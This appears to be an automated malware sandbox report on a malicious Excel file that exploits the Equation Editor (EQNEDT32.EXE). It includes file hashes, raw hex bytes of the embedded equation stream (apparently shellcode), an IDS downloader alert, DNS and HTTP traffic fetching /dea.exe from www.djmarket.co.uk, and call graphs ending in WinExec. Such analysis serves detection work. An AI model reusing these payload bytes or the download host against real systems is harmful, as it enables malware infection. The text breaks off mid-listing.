                    SHA256:0a5a10b580a5060cd9621d9bb5002bb9b9ed6e2d1cc62bbb6a2d269201de76fc
                    SHA512:df4ab78a39f0afa06e64100ab7cdaa530e6ff3a171ba4958432c00f1948782f025cbf32e2925c5b729d202861aa14c8af880eaab58d8b60f5ba0a19d52ef502c
                    SSDEEP:1536:PD/KDqq4tzcs51tqmjAE4GnOzcFZ+63WJApbBK:riDqq4twsX3jNQoX+63BK
                    TLSH:A1630220EE476CE6DF0FB1F1C10C5BCA67E5E6ABF153A8CFD2D2241E0056B85296845E
                    File Content Preview:PK...........N.q27............[Content_Types].xmlUT....9.\.9.\.9.\...n.0.E.......1tQU..Ei.....L<.._....w..RQ.Va.'..{fFcw......T.....Y..tR..`_...3.0.+.v....d...]w.....-.l...........`ig....>C..(.....n?....6.b.`....b.c.....L.hd...0..&..........JkO.IY..Ly|...
                    Icon Hash:2562ab89a7b7bfbf
                    Document Type:OpenXML
                    Number of OLE Files:1
                    Has Summary Info:
                    Application Name:
                    Encrypted Document:False
                    Contains Word Document Stream:False
                    Contains Workbook/Book Stream:True
                    Contains PowerPoint Document Stream:False
                    Contains Visio Document Stream:False
                    Contains ObjectPool Stream:False
                    Flash Objects Count:0
                    Contains VBA Macros:False
                    Author:
                    Last Saved By:
                    Create Time:2006-09-16T00:00:00Z
                    Last Saved Time:2018-12-02T14:07:26Z
                    Creating Application:Microsoft Excel
                    Security:0
                    Thumbnail Scaling Desired:false
                    Company:
                    Contains Dirty Links:false
                    Shared Document:false
                    Changed Hyperlinks:false
                    Application Version:15.0300
                    General
                    Stream Path:EQuaTiON nAtIVe
                    CLSID:
                    File Type:data
                    Stream Size:2033
                    Entropy:7.6084814038382955
                    Base64 Encoded:False
                    Data ASCII:. . Z . . g ^ . & . p . : . . ] . . i . S ? . b % . . [ 4 | w . @ . 1 . V B g F . V . O G . 5 l B . 0 . . N c 2 a > O J . W . . . . : ' u e . r P . . . C Y + g g . t p [ = . v , . . z % . v - x 3 8 . . : , . / r 4 . b i C s x F < ] . . 5 < 9 . } . L ! U . . e U | \\ . . 0 r * R . \\ y < & u M . . r . . = . . . . 7 r " . 1 . . H . 8 . . l L K . U = . . - Q . G , k > a % & O P d | F ] . M > G . . . . . . d & . z e < . 3 c x . F T ! f . . + ' ~ W { - . : z 7 X . H " y . } W B 3 . . Z M . M . . . A . \\ }
                    Data Raw:1c 00 5a af 00 00 91 67 be e7 5e 01 f2 b5 a9 20 26 1e 70 13 3a d2 ad 0e 5d 07 1e 69 02 53 3f 0f 62 25 01 08 5b 34 b9 7c ff 77 8e 81 e1 bc bd cd 40 8b 09 8b 31 b9 f9 7f 56 42 81 e1 b2 67 46 20 8b 11 56 ff d2 83 c0 4f ff e0 96 e7 47 dc a6 35 a4 6c d9 e3 42 00 b1 30 88 16 0c 4e 63 9b 32 61 3e 4f 4a 94 83 c7 f0 0a 57 f0 ef e9 b4 01 00 00 11 3a 27 80 75 65 08 d0 72 50 df 8a ad 1f 12 43
                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2025-01-08T11:06:20.825421+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.2249161104.155.138.21443TCP
                    TimestampSource PortDest PortSource IPDest IP
                    Jan 8, 2025 11:06:19.978030920 CET49161443192.168.2.22104.155.138.21
                    Jan 8, 2025 11:06:19.978074074 CET44349161104.155.138.21192.168.2.22
                    Jan 8, 2025 11:06:19.978137970 CET49161443192.168.2.22104.155.138.21
                    Jan 8, 2025 11:06:19.979700089 CET49161443192.168.2.22104.155.138.21
                    Jan 8, 2025 11:06:19.979712963 CET44349161104.155.138.21192.168.2.22
                    Jan 8, 2025 11:06:20.508899927 CET44349161104.155.138.21192.168.2.22
                    Jan 8, 2025 11:06:20.509057999 CET49161443192.168.2.22104.155.138.21
                    Jan 8, 2025 11:06:20.513778925 CET49161443192.168.2.22104.155.138.21
                    Jan 8, 2025 11:06:20.513789892 CET44349161104.155.138.21192.168.2.22
                    Jan 8, 2025 11:06:20.514103889 CET44349161104.155.138.21192.168.2.22
                    Jan 8, 2025 11:06:20.699220896 CET49161443192.168.2.22104.155.138.21
                    Jan 8, 2025 11:06:20.739334106 CET44349161104.155.138.21192.168.2.22
                    Jan 8, 2025 11:06:20.825489998 CET44349161104.155.138.21192.168.2.22
                    Jan 8, 2025 11:06:20.825562954 CET44349161104.155.138.21192.168.2.22
                    Jan 8, 2025 11:06:20.825609922 CET49161443192.168.2.22104.155.138.21
                    Jan 8, 2025 11:06:20.825727940 CET49161443192.168.2.22104.155.138.21
                    Jan 8, 2025 11:06:20.825740099 CET44349161104.155.138.21192.168.2.22
                    Jan 8, 2025 11:06:20.825764894 CET49161443192.168.2.22104.155.138.21
                    Jan 8, 2025 11:06:20.825771093 CET44349161104.155.138.21192.168.2.22
                    TimestampSource PortDest PortSource IPDest IP
                    Jan 8, 2025 11:06:19.944566011 CET5456253192.168.2.228.8.8.8
                    Jan 8, 2025 11:06:19.962464094 CET53545628.8.8.8192.168.2.22
                    Jan 8, 2025 11:06:19.970488071 CET5291753192.168.2.228.8.8.8
                    Jan 8, 2025 11:06:19.977556944 CET53529178.8.8.8192.168.2.22
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jan 8, 2025 11:06:19.944566011 CET192.168.2.228.8.8.80x30f7Standard query (0)www.djmarket.co.ukA (IP address)IN (0x0001)false
                    Jan 8, 2025 11:06:19.970488071 CET192.168.2.228.8.8.80x4e23Standard query (0)www.djmarket.co.ukA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jan 8, 2025 11:06:19.962464094 CET8.8.8.8192.168.2.220x30f7No error (0)www.djmarket.co.uk104.155.138.21A (IP address)IN (0x0001)false
                    Jan 8, 2025 11:06:19.962464094 CET8.8.8.8192.168.2.220x30f7No error (0)www.djmarket.co.uk107.178.223.183A (IP address)IN (0x0001)false
                    Jan 8, 2025 11:06:19.977556944 CET8.8.8.8192.168.2.220x4e23No error (0)www.djmarket.co.uk107.178.223.183A (IP address)IN (0x0001)false
                    Jan 8, 2025 11:06:19.977556944 CET8.8.8.8192.168.2.220x4e23No error (0)www.djmarket.co.uk104.155.138.21A (IP address)IN (0x0001)false
                    • www.djmarket.co.uk
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.2249161104.155.138.214433384C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    TimestampBytes transferredDirectionData
                    2025-01-08 10:06:20 UTC75OUTGET /dea.exe HTTP/1.1
                    Connection: Keep-Alive
                    Host: www.djmarket.co.uk
                    2025-01-08 10:06:20 UTC38INHTTP/1.1 200 OK
                    Content-Length: 0


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:05:05:59
                    Start date:08/01/2025
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x13f970000
                    File size:28'253'536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Target ID:2
                    Start time:05:06:18
                    Start date:08/01/2025
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Imagebase:0x400000
                    File size:543'304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Reset < >

                      Execution Graph

                      Execution Coverage:20.6%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:46.8%
                      Total number of Nodes:444
                      Total number of Limit Nodes:4
                      execution_graph 1646 3550711 GetPEB 1647 355071f 1646->1647 1948 35503ed ExitProcess 1990 3550406 1948->1990 1950 35503f9 1952 3550413 1950->1952 2031 3550422 1950->2031 1953 3550494 CreateFileW 1952->1953 1954 355045e 1952->1954 2070 3550449 1952->2070 1957 35504d2 28 API calls 1953->1957 1962 35504c2 1953->1962 2142 355049b 1954->2142 1957->1962 1965 355042f 1965->1953 2107 3550488 1965->2107 1991 355040c 1990->1991 1992 3550422 38 API calls 1991->1992 1993 3550413 1992->1993 1994 3550494 CreateFileW 1993->1994 1995 355045e 1993->1995 1996 3550449 35 API calls 1993->1996 1998 35504d2 28 API calls 1994->1998 2003 35504c2 1994->2003 1997 355049b 29 API calls 1995->1997 2006 355042f 1996->2006 1999 355048b 1997->1999 1998->2003 2000 35504f7 1999->2000 2001 3550492 1999->2001 2004 355050b 23 API calls 2000->2004 2001->1994 2002 35504fa 2001->2002 2005 3550541 21 API calls 2002->2005 2004->2002 2008 355051b 2005->2008 2006->1994 2007 3550488 32 API calls 2006->2007 2007->1995 2009 35505c6 2008->2009 2010 3550583 17 API calls 2008->2010 2013 35505ef 2009->2013 2014 35505f9 9 API calls 2009->2014 2011 3550571 2010->2011 2012 355061d 2011->2012 2015 35505ab 2011->2015 2017 3550637 5 API calls 2012->2017 2016 3550698 3 API calls 2013->2016 2021 3550691 2013->2021 2022 35505f4 2013->2022 2014->2013 2019 35505dd 11 API calls 2015->2019 2018 355068c 2016->2018 2017->2013 2020 35506f6 WinExec 2018->2020 2018->2021 2019->2009 2023 355070a ExitProcess 2020->2023 2024 35506b9 3 API calls 2021->2024 2022->1950 2025 35506fe 2023->2025 2026 35506a5 2024->2026 2027 355071d 2025->2027 2028 355070d ExitProcess 2025->2028 2026->2027 2029 35506ea 3 API calls 2026->2029 2027->1950 2030 35506e2 2029->2030 2032 3550428 2031->2032 2033 3550449 35 API calls 2032->2033 2036 355042f 2032->2036 2033->2036 2034 3550494 CreateFileW 2035 35504d2 28 API calls 2034->2035 2037 35504c2 2034->2037 2035->2037 2036->2034 2038 3550488 32 API calls 2036->2038 2039 355045e 2038->2039 2040 355049b 29 API calls 2039->2040 2041 355048b 2040->2041 2042 35504f7 2041->2042 2043 3550492 2041->2043 2045 355050b 23 API calls 2042->2045 2043->2034 2044 35504fa 2043->2044 2046 3550541 21 API calls 2044->2046 2045->2044 2047 355051b 2046->2047 2048 3550583 17 API calls 2047->2048 2049 35505c6 2047->2049 2050 3550571 2048->2050 2052 35505f9 9 API calls 2049->2052 2054 35505ef 2049->2054 2051 355061d 2050->2051 2053 35505ab 2050->2053 2056 3550637 5 API calls 2051->2056 2052->2054 2058 35505dd 11 API calls 2053->2058 2055 3550698 3 API calls 2054->2055 2060 3550691 2054->2060 2061 35505f4 2054->2061 2057 355068c 2055->2057 2056->2054 2059 35506f6 WinExec 2057->2059 2057->2060 2058->2049 2062 355070a ExitProcess 2059->2062 2063 35506b9 3 API calls 2060->2063 2061->1952 2064 35506fe 2062->2064 2065 35506a5 2063->2065 2066 355071d 2064->2066 2067 355070d ExitProcess 2064->2067 2065->2066 2068 35506ea 3 API calls 2065->2068 2066->1952 2069 35506e2 2068->2069 2071 355044c 2070->2071 2072 3550488 32 API calls 2071->2072 2073 355045e 2072->2073 2074 355049b 29 API calls 2073->2074 2075 355048b 2074->2075 2076 35504f7 2075->2076 2077 3550492 2075->2077 2080 355050b 23 API calls 2076->2080 2078 3550494 CreateFileW 2077->2078 2079 35504fa 2077->2079 2081 35504d2 28 API calls 2078->2081 2083 35504c2 2078->2083 2082 3550541 21 API calls 2079->2082 2080->2079 2081->2083 2084 355051b 2082->2084 2085 3550583 17 API calls 2084->2085 2098 35505c6 2084->2098 2086 3550571 2085->2086 2087 355061d 2086->2087 2089 35505ab 2086->2089 2091 3550637 5 API calls 2087->2091 2088 35505f9 9 API calls 2093 35505ef 2088->2093 2094 35505dd 11 API calls 2089->2094 2090 3550698 3 API calls 2092 355068c 2090->2092 2091->2093 2095 35506f6 WinExec 2092->2095 2096 3550691 2092->2096 2093->2090 2093->2096 2097 35505f4 2093->2097 2094->2098 2099 355070a ExitProcess 2095->2099 2100 35506b9 3 API calls 2096->2100 2097->1965 2098->2088 2098->2093 2101 35506fe 2099->2101 2102 35506a5 2100->2102 2103 355071d 2101->2103 2104 355070d ExitProcess 2101->2104 2102->2103 2105 35506ea 3 API calls 2102->2105 2103->1965 2106 35506e2 2105->2106 2108 3550489 2107->2108 2109 355049b 29 API calls 2108->2109 2110 355048b 2109->2110 2111 35504f7 2110->2111 2112 3550492 2110->2112 2115 355050b 23 API calls 2111->2115 2113 3550494 CreateFileW 2112->2113 2114 35504fa 2112->2114 2116 35504d2 28 API calls 2113->2116 2118 35504c2 2113->2118 2117 3550541 21 API calls 2114->2117 2115->2114 2116->2118 2119 355051b 2117->2119 2120 35505c6 2119->2120 2121 3550583 17 API calls 2119->2121 2124 35505ef 2120->2124 2125 35505f9 9 API calls 2120->2125 2122 3550571 2121->2122 2123 355061d 2122->2123 2129 35505ab 2122->2129 2127 3550637 5 API calls 2123->2127 2126 3550698 3 API calls 2124->2126 2132 3550691 2124->2132 2133 35505f4 2124->2133 2125->2124 2128 355068c 2126->2128 2127->2124 2131 35506f6 WinExec 2128->2131 2128->2132 2130 35505dd 11 API calls 2129->2130 2130->2120 2134 355070a ExitProcess 2131->2134 2135 35506b9 3 API calls 2132->2135 2133->1954 2136 35506fe 2134->2136 2137 35506a5 2135->2137 2138 355071d 2136->2138 2139 355070d ExitProcess 2136->2139 2137->2138 2140 35506ea 3 API calls 2137->2140 2138->1954 2141 35506e2 2140->2141 2143 355049e CreateFileW 2142->2143 2144 35504d2 28 API calls 2143->2144 2145 35504c2 2144->2145 1648 355049b 1649 355049e CreateFileW 1648->1649 1652 35504d2 LoadLibraryW 1649->1652 1651 35504c2 1682 35504e7 1652->1682 1654 355051b 1656 35505c6 1654->1656 1711 3550583 1654->1711 1655 35504db 1655->1654 1745 355050b 1655->1745 1662 35505ef 1656->1662 1817 35505f9 1656->1817 1659 3550571 1661 355061d 1659->1661 1668 35505ab 1659->1668 1660 35504fc 1772 3550541 1660->1772 1836 3550637 1661->1836 1671 3550691 1662->1671 1672 35505f4 1662->1672 1735 3550698 1662->1735 1667 355068c 1670 35506f6 WinExec 1667->1670 1667->1671 1799 35505dd 1668->1799 1743 355070a 1670->1743 1851 35506b9 1671->1851 1672->1651 1675 35506fe 1678 355071d 1675->1678 1679 355070d ExitProcess 1675->1679 1678->1651 1683 35504ea 1682->1683 1684 355050b 23 API calls 1683->1684 1685 35504fc 1684->1685 1686 3550541 21 API calls 1685->1686 1687 355051b 1686->1687 1688 3550583 17 API calls 1687->1688 1689 35505c6 1687->1689 1690 3550571 1688->1690 1692 35505f9 9 API calls 1689->1692 1694 35505ef 1689->1694 1691 355061d 1690->1691 1693 35505ab 1690->1693 1696 3550637 5 API calls 1691->1696 1692->1694 1698 35505dd 11 API calls 1693->1698 1695 3550698 3 API calls 1694->1695 1700 3550691 1694->1700 1701 35505f4 1694->1701 1697 355068c 1695->1697 1696->1694 1699 35506f6 WinExec 1697->1699 1697->1700 1698->1689 1702 355070a ExitProcess 1699->1702 1703 35506b9 3 API calls 1700->1703 1701->1655 1704 35506fe 1702->1704 1705 35506a5 1703->1705 1707 355070d ExitProcess 1704->1707 1708 355071d 1704->1708 1706 35506b7 1705->1706 1705->1708 1855 35506ea 1706->1855 1708->1655 1862 3550590 1711->1862 1713 3550588 1714 355061d 1713->1714 1715 35505ab 1713->1715 1716 3550637 5 API calls 1714->1716 1717 35505dd 11 API calls 1715->1717 1728 35505ef 1716->1728 1719 35505c6 1717->1719 1718 3550691 1720 35506b9 3 API calls 1718->1720 1725 35505f9 9 API calls 1719->1725 1719->1728 1721 35506a5 1720->1721 1724 35506b7 1721->1724 1731 355071d 1721->1731 1722 3550698 3 API calls 1723 355068c 1722->1723 1723->1718 1726 35506f6 WinExec 1723->1726 1729 35506ea 3 API calls 1724->1729 1725->1728 1727 355070a ExitProcess 1726->1727 1733 35506fe 1727->1733 1728->1718 1728->1722 1730 35505f4 1728->1730 1732 35506e2 1729->1732 1730->1659 1731->1659 1733->1731 1734 355070d ExitProcess 1733->1734 1736 355069b 1735->1736 1737 35506b9 3 API calls 1736->1737 1738 35506a5 1737->1738 1739 35506b7 1738->1739 1741 355071d 1738->1741 1740 35506ea 3 API calls 1739->1740 1742 35506e2 1740->1742 1741->1667 1744 355070d ExitProcess 1743->1744 1746 355050e 1745->1746 1747 3550541 21 API calls 1746->1747 1748 355051b 1747->1748 1749 3550583 17 API calls 1748->1749 1750 35505c6 1748->1750 1751 3550571 1749->1751 1753 35505f9 9 API calls 1750->1753 1755 35505ef 1750->1755 1752 355061d 1751->1752 1754 35505ab 1751->1754 1757 3550637 5 API calls 1752->1757 1753->1755 1759 35505dd 11 API calls 1754->1759 1756 3550698 3 API calls 1755->1756 1761 3550691 1755->1761 1762 35505f4 1755->1762 1758 355068c 1756->1758 1757->1755 1760 35506f6 WinExec 1758->1760 1758->1761 1759->1750 1763 355070a ExitProcess 1760->1763 1764 35506b9 3 API calls 1761->1764 1762->1660 1765 35506fe 1763->1765 1766 35506a5 1764->1766 1768 355071d 1765->1768 1769 355070d ExitProcess 1765->1769 1767 35506b7 1766->1767 1766->1768 1770 35506ea 3 API calls 1767->1770 1768->1660 1771 35506e2 1770->1771 1773 3550544 1772->1773 1775 355054a 1773->1775 1907 355055d 1773->1907 1776 3550583 17 API calls 1775->1776 1777 35505c6 1775->1777 1778 3550571 1776->1778 1780 35505f9 9 API calls 1777->1780 1782 35505ef 1777->1782 1779 355061d 1778->1779 1781 35505ab 1778->1781 1784 3550637 5 API calls 1779->1784 1780->1782 1786 35505dd 11 API calls 1781->1786 1783 3550698 3 API calls 1782->1783 1788 3550691 1782->1788 1789 35505f4 1782->1789 1785 355068c 1783->1785 1784->1782 1787 35506f6 WinExec 1785->1787 1785->1788 1786->1777 1790 355070a ExitProcess 1787->1790 1791 35506b9 3 API calls 1788->1791 1789->1654 1792 35506fe 1790->1792 1793 35506a5 1791->1793 1794 355071d 1792->1794 1795 355070d ExitProcess 1792->1795 1793->1794 1796 35506b7 1793->1796 1794->1654 1797 35506ea 3 API calls 1796->1797 1798 35506e2 1797->1798 1800 35505e0 1799->1800 1801 35505f9 9 API calls 1800->1801 1803 35505ef 1801->1803 1802 35505f4 1802->1656 1803->1802 1804 3550698 3 API calls 1803->1804 1805 355068c 1804->1805 1806 35506f6 WinExec 1805->1806 1807 3550691 1805->1807 1808 355070a ExitProcess 1806->1808 1809 35506b9 3 API calls 1807->1809 1810 35506fe 1808->1810 1811 35506a5 1809->1811 1813 355071d 1810->1813 1814 355070d ExitProcess 1810->1814 1812 35506b7 1811->1812 1811->1813 1815 35506ea 3 API calls 1812->1815 1813->1656 1816 35506e2 1815->1816 1818 35505fc 1817->1818 1931 355061d 1818->1931 1820 35506f6 WinExec 1823 355070a ExitProcess 1820->1823 1821 3550691 1827 35506b9 3 API calls 1821->1827 1822 3550603 1825 3550627 1822->1825 1826 3550637 5 API calls 1822->1826 1830 3550688 1822->1830 1824 35506fe 1823->1824 1832 355070d ExitProcess 1824->1832 1833 355071d 1824->1833 1825->1821 1829 3550698 3 API calls 1825->1829 1826->1825 1828 35506a5 1827->1828 1831 35506b7 1828->1831 1828->1833 1829->1830 1830->1820 1830->1821 1834 35506ea 3 API calls 1831->1834 1833->1662 1835 35506e2 1834->1835 1841 355063a 1836->1841 1837 3550698 3 API calls 1838 355068c 1837->1838 1839 35506f6 WinExec 1838->1839 1840 3550691 1838->1840 1842 355070a ExitProcess 1839->1842 1843 35506b9 3 API calls 1840->1843 1841->1837 1844 35506fe 1842->1844 1845 35506a5 1843->1845 1847 355071d 1844->1847 1848 355070d ExitProcess 1844->1848 1846 35506b7 1845->1846 1845->1847 1849 35506ea 3 API calls 1846->1849 1847->1662 1850 35506e2 1849->1850 1852 35506bc 1851->1852 1853 35506ea 3 API calls 1852->1853 1854 35506e2 1853->1854 1856 35506ed WinExec 1855->1856 1858 355070a ExitProcess 1856->1858 1859 35506fe 1858->1859 1860 355070d ExitProcess 1859->1860 1861 35506e2 1859->1861 1863 3550593 1862->1863 1887 35505ac 1863->1887 1865 3550599 1866 355061d 1865->1866 1867 35505ab 1865->1867 1868 3550637 5 API calls 1866->1868 1869 35505dd 11 API calls 1867->1869 1880 35505ef 1868->1880 1871 35505c6 1869->1871 1870 3550691 1872 35506b9 3 API calls 1870->1872 1877 35505f9 9 API calls 1871->1877 1871->1880 1873 35506a5 1872->1873 1876 35506b7 1873->1876 1883 355071d 1873->1883 1874 3550698 3 API calls 1875 355068c 1874->1875 1875->1870 1878 35506f6 WinExec 1875->1878 1881 35506ea 3 API calls 1876->1881 1877->1880 1879 355070a ExitProcess 1878->1879 1885 35506fe 1879->1885 1880->1870 1880->1874 1882 35505f4 1880->1882 1884 35506e2 1881->1884 1882->1713 1883->1713 1885->1883 1886 355070d ExitProcess 1885->1886 1888 35505af 1887->1888 1889 35505dd 11 API calls 1888->1889 1890 35505c6 1889->1890 1891 35505f9 9 API calls 1890->1891 1892 35505ef 1890->1892 1891->1892 1893 3550698 3 API calls 1892->1893 1897 35505f4 1892->1897 1894 355068c 1893->1894 1895 35506f6 WinExec 1894->1895 1896 3550691 1894->1896 1898 355070a ExitProcess 1895->1898 1899 35506b9 3 API calls 1896->1899 1897->1865 1900 35506fe 1898->1900 1901 35506a5 1899->1901 1903 355071d 1900->1903 1904 355070d ExitProcess 1900->1904 1902 35506b7 1901->1902 1901->1903 1905 35506ea 3 API calls 1902->1905 1903->1865 1906 35506e2 1905->1906 1908 3550560 1907->1908 1909 3550571 1908->1909 1910 3550583 17 API calls 1908->1910 1911 355061d 1909->1911 1912 35505ab 1909->1912 1910->1909 1913 3550637 5 API calls 1911->1913 1914 35505dd 11 API calls 1912->1914 1923 35505ef 1913->1923 1916 35505c6 1914->1916 1915 3550691 1917 35506b9 3 API calls 1915->1917 1921 35505f9 9 API calls 1916->1921 1916->1923 1920 35506a5 1917->1920 1918 3550698 3 API calls 1919 355068c 1918->1919 1919->1915 1922 35506f6 WinExec 1919->1922 1925 355071d 1920->1925 1926 35506ea 3 API calls 1920->1926 1921->1923 1924 355070a ExitProcess 1922->1924 1923->1915 1923->1918 1927 35505f4 1923->1927 1929 35506fe 1924->1929 1925->1775 1928 35506e2 1926->1928 1927->1775 1929->1925 1930 355070d ExitProcess 1929->1930 1932 355061f 1931->1932 1933 3550637 5 API calls 1932->1933 1937 3550627 1933->1937 1934 3550691 1935 35506b9 3 API calls 1934->1935 1936 35506a5 1935->1936 1940 35506b7 1936->1940 1944 355071d 1936->1944 1937->1934 1938 3550698 3 API calls 1937->1938 1939 355068c 1938->1939 1939->1934 1941 35506f6 WinExec 1939->1941 1943 35506ea 3 API calls 1940->1943 1942 355070a ExitProcess 1941->1942 1946 35506fe 1942->1946 1945 35506e2 1943->1945 1944->1822 1946->1944 1947 355070d ExitProcess 1946->1947

                      Callgraph

                      • Executed
                      • Not Executed
                      • Opacity -> Relevance
                      • Disassembly available
                      callgraph 0 Function_03550711 26 Function_03550739 0->26 1 Function_035500D1 2 Function_03550590 5 Function_035505DD 2->5 7 Function_03550698 2->7 19 Function_0355070A 2->19 20 Function_03550637 2->20 24 Function_035505F9 2->24 25 Function_035506B9 2->25 2->26 31 Function_035505AC 2->31 33 Function_035506EA 2->33 3 Function_035504D2 3->5 3->7 12 Function_03550541 3->12 14 Function_03550583 3->14 17 Function_0355050B 3->17 3->19 3->20 3->24 3->25 3->26 27 Function_035504E7 3->27 3->33 4 Function_0355061D 4->7 4->19 4->20 4->25 4->26 4->33 5->7 5->19 5->24 5->25 5->26 5->33 6 Function_0355055D 6->5 6->7 6->14 6->19 6->20 6->24 6->25 6->26 6->33 7->25 7->26 7->33 8 Function_0355049B 8->3 9 Function_0355035B 10 Function_035501C5 11 Function_03550406 11->3 11->5 11->7 11->8 11->12 11->14 15 Function_03550449 11->15 16 Function_03550488 11->16 11->17 18 Function_0355078A 11->18 11->19 11->20 11->24 11->25 11->26 29 Function_03550422 11->29 11->33 12->5 12->6 12->7 12->14 12->19 12->20 12->24 12->25 12->26 12->33 13 Function_03550000 14->2 14->5 14->7 14->19 14->20 14->24 14->25 14->26 14->33 15->3 15->5 15->7 15->8 15->12 15->14 15->16 15->17 15->19 15->20 15->24 15->25 15->26 15->33 16->3 16->5 16->7 16->8 16->12 16->14 16->17 16->19 16->20 16->24 16->25 16->26 16->33 17->5 17->7 17->12 17->14 17->19 17->20 17->24 17->25 17->26 17->33 20->7 20->19 20->25 20->26 20->33 21 Function_035501F6 22 Function_035501B6 23 Function_035500FE 24->4 24->7 24->19 24->20 24->25 24->26 24->33 25->33 27->5 27->7 27->12 27->14 27->17 27->19 27->20 27->24 27->25 27->26 27->33 28 Function_035500A3 29->3 29->5 29->7 29->8 29->12 29->14 29->15 29->16 29->17 29->18 29->19 29->20 29->24 29->25 29->26 29->33 30 Function_035503ED 30->3 30->5 30->7 30->8 30->11 30->12 30->14 30->15 30->16 30->17 30->19 30->20 30->24 30->25 30->26 30->29 30->33 31->5 31->7 31->19 31->24 31->25 31->26 31->33 32 Function_035501EE 33->19

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 35503ed-355040c ExitProcess call 3550406 4 3550413-3550414 0->4 5 355040e call 3550422 0->5 6 3550467-3550482 4->6 7 3550417 4->7 5->4 8 3550484-3550487 6->8 9 3550419-355041c 7->9 10 3550488-3550490 call 355049b 7->10 8->10 9->8 11 355041f 9->11 23 35504f7-3550507 call 355050b 10->23 24 3550492-3550493 10->24 12 3550494-35504ba CreateFileW 11->12 13 3550421-355043f call 3550449 11->13 17 35504c2-35504d0 12->17 18 35504bd call 35504d2 12->18 13->12 33 3550441-3550466 call 3550488 13->33 18->17 31 355050e-3550556 call 3550541 23->31 24->12 27 35504fa-3550507 24->27 27->31 45 35505ce-35505d2 31->45 46 3550559-35505a5 call 3550583 31->46 33->6 47 35505d4-35505da 45->47 48 3550639-355063a 45->48 59 355061d 46->59 60 35505a8 46->60 53 3550641-355064d 47->53 54 35505dc-35505f0 call 35505f9 47->54 50 355063c-3550640 48->50 50->53 61 3550684-355068f call 3550698 53->61 62 355064f-3550654 53->62 67 355065b-3550682 54->67 73 35505f2 54->73 64 355061f-3550634 call 3550637 59->64 60->64 65 35505ab-35505c7 call 35505dd 60->65 76 35506f6-3550701 WinExec call 355070a 61->76 77 3550691-3550696 61->77 66 3550656 62->66 62->67 78 3550697 64->78 79 3550636 64->79 65->45 66->67 67->50 81 35505f4-35505fd 73->81 82 3550659 73->82 91 3550753 76->91 92 3550703 76->92 84 355069a-35506b0 call 35506b9 77->84 78->84 79->48 82->67 104 35506b2 84->104 105 355071e-3550726 84->105 95 3550755-3550759 91->95 96 355075b-355075f 91->96 97 3550705-355070f ExitProcess 92->97 98 3550774-3550776 92->98 95->96 100 3550767-355076e 95->100 96->98 101 3550761-3550765 96->101 103 3550786-3550787 98->103 110 3550770 100->110 111 3550772 100->111 101->98 101->100 106 35506b4-35506b5 104->106 107 355071d 104->107 108 355074c-3550750 105->108 109 3550728-355072a 105->109 112 35506b7-35506e3 call 35506ea 106->112 113 355072b-3550730 106->113 107->105 108->91 109->113 110->98 111->98 114 3550778-3550781 111->114 117 3550732-3550736 113->117 118 355071f-3550730 call 3550739 113->118 121 3550783 114->121 122 355074a-355074d 114->122 118->117 121->103 122->114 125 355074f 122->125 125->91
                      APIs
                      • ExitProcess.KERNELBASE(035503DB), ref: 035503ED
                        • Part of subcall function 03550406: CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 035504B8
                      Memory Dump Source
                      • Source File: 00000002.00000002.393312476.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                      Similarity
                      • API ID: CreateExitFileProcess
                      • String ID:
                      • API String ID: 2838702978-0
                      • Opcode ID: de9647637b449e96e956aa500f923388ea930e7db4d22bfaa0e34c3dfbccd69b
                      • Instruction ID: 01e360385a4176d933c5ba3fad85f230df93b6b1120dc35bedc68402e64b1c39
                      • Opcode Fuzzy Hash: de9647637b449e96e956aa500f923388ea930e7db4d22bfaa0e34c3dfbccd69b
                      • Instruction Fuzzy Hash: A121EE6A40D3C08FD321D7707ABA754FE607B52701F1C898BA9814F1F3E660B1069352

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 127 3550637-355063a 129 355063c-355064d 127->129 132 3550684-355068f call 3550698 129->132 133 355064f-3550654 129->133 138 35506f6-3550701 WinExec call 355070a 132->138 139 3550691-35506b0 call 35506b9 132->139 134 3550656 133->134 135 355065b-3550682 133->135 134->135 135->129 148 3550753 138->148 149 3550703 138->149 161 35506b2 139->161 162 355071e-3550726 139->162 152 3550755-3550759 148->152 153 355075b-355075f 148->153 154 3550705-355070f ExitProcess 149->154 155 3550774-3550776 149->155 152->153 157 3550767-355076e 152->157 153->155 158 3550761-3550765 153->158 160 3550786-3550787 155->160 167 3550770 157->167 168 3550772 157->168 158->155 158->157 163 35506b4-35506b5 161->163 164 355071d 161->164 165 355074c-3550750 162->165 166 3550728-355072a 162->166 169 35506b7-35506e3 call 35506ea 163->169 170 355072b-3550730 163->170 164->162 165->148 166->170 167->155 168->155 171 3550778-3550781 168->171 174 3550732-3550736 170->174 175 355071f-3550730 call 3550739 170->175 178 3550783 